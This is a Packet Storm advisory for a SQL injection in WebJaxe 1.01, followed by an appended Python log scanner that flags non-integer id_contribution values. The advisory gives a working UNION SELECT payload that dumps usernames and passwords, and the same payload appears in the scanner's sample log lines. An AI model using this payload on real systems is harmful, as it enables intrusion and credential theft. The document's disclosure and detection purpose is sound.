WebJaxe 1.01 SQL Injection

2010-05-19T00:00:00
ID PACKETSTORM:89666
Type packetstorm
Reporter IHTeam
Modified 2010-05-19T00:00:00

Description

                                        
```
###############################################################################
#
# Exploit Title: WebJaxe Sql Injection
# Date: 14-05-2010
# Author: IHTeam
# Software Link: http://media4.obspm.fr/outils/webjaxe/en/
# Version: 1.01
# Tested on: Win/Linux
#
###############################################################################

!You need a registered user!

http://[site]/[path]/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=[SQL]

Example (Show username:password):
http://localhost/webjaxe/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(prenom,char(58),motdepasse),3,4,5,6/**/FROM/**/utilisateurs
```
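For detection, the following added example (not part of the advisory and not WebJaxe code) scans web server access logs for requests to the affected page whose `id_contribution` value is not a plain integer. It assumes combined-format log lines and that legitimate ids are non-negative integers; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint, page and parameter names are taken from the advisory above.
ENDPOINT_SUFFIX = "/php/partie_administrateur/administration.php"
PAGE_VALUE = "projet_contribution"
PARAM = "id_contribution"
# Assumption: a legitimate id_contribution is a plain non-negative integer.
VALID_ID = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def suspicious_ids(log_line):
    """Return the id_contribution values in one log line that are not integers."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith(ENDPOINT_SUFFIX):
        return []
    # parse_qs percent-decodes values and keeps repeated parameters as a list.
    query = parse_qs(url.query, keep_blank_values=True)
    if PAGE_VALUE not in query.get("page", []):
        return []
    return [v for v in query.get(PARAM, []) if not VALID_ID.fullmatch(v)]


def scan(lines):
    """Return (line_number, client_ip, bad_values) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        bad = suspicious_ids(line)
        if bad:
            hits.append((n, line.split(" ", 1)[0], bad))
    return hits


# Constructed sample log lines (not from a real server); page=other_page is hypothetical.
_ADMIN = "/webjaxe/php/partie_administrateur/administration.php?page="
_T = "[19/May/2010:10:00:00 +0000]"
SAMPLE_LOG = [
    f'192.0.2.10 - - {_T} "GET {_ADMIN}projet_contribution&id_contribution=12 HTTP/1.1" 200 5120',
    f'192.0.2.44 - - {_T} "GET {_ADMIN}projet_contribution&id_contribution=-1/**/UNION/**/ALL/**/SELECT/**/1 HTTP/1.1" 200 7340',
    f'192.0.2.44 - - {_T} "GET {_ADMIN}projet_contribution&id_contribution=-1%2F**%2FUNION%2F**%2FALL HTTP/1.1" 200 7340',
    f'192.0.2.10 - - {_T} "GET {_ADMIN}other_page&id_contribution=abc HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The same integer-only rule, applied server-side before the value reaches the query, is the corresponding input check; values sent in a POST body do not appear in access logs and need application-level logging.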